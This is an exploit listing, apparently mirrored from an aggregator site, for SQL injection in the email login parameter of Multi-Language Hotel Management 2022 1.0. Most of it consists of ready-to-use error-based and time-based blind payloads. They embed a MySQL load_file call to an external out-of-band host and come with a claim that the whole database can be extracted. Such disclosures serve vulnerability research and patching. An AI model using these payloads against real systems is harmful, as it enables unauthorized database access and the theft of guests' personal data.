Exploit for Multi-Language Hotel Management 2022 1.0 SQL Injection

Name: Exploit for Multi-Language Hotel Management 2022 1.0 SQL Injection
Rating: 5 (200 reviews)
2022-08-03 | CVSS -0.0
## https://sploitus.com/exploit?id=PACKETSTORM:167912
## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi  
## Author: nu11secur1ty  
## Date: 08.03.2022  
## Vendor: https://www.nikhilbhalerao.com/  
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022/Docs/sparkz.zip  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022  
  
  
## Description:  
The `email` parameter appears to be vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+'  
was submitted in the email parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The attacker can easily get the all database from this hotel system  
and can do very malicious stuff with the users who are inside of this  
system.  
  
Status: CRITICAL  
  
[+] Payloads:  
  
```mysql  
---  
Parameter: email (POST)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: email=hmqHtDjH@burpcollaborator.net'+(select  
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT  
0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT  
COUNT(*),CONCAT(0x7162787671,(SELECT  
(ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY  
x)a))||'&password=m5S!k0l!S6&login=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: email=hmqHtDjH@burpcollaborator.net'+(select  
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT  
0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM  
(SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login=  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022)  
  
## Proof and Exploit:  
[href](https://streamable.com/uk7zq2)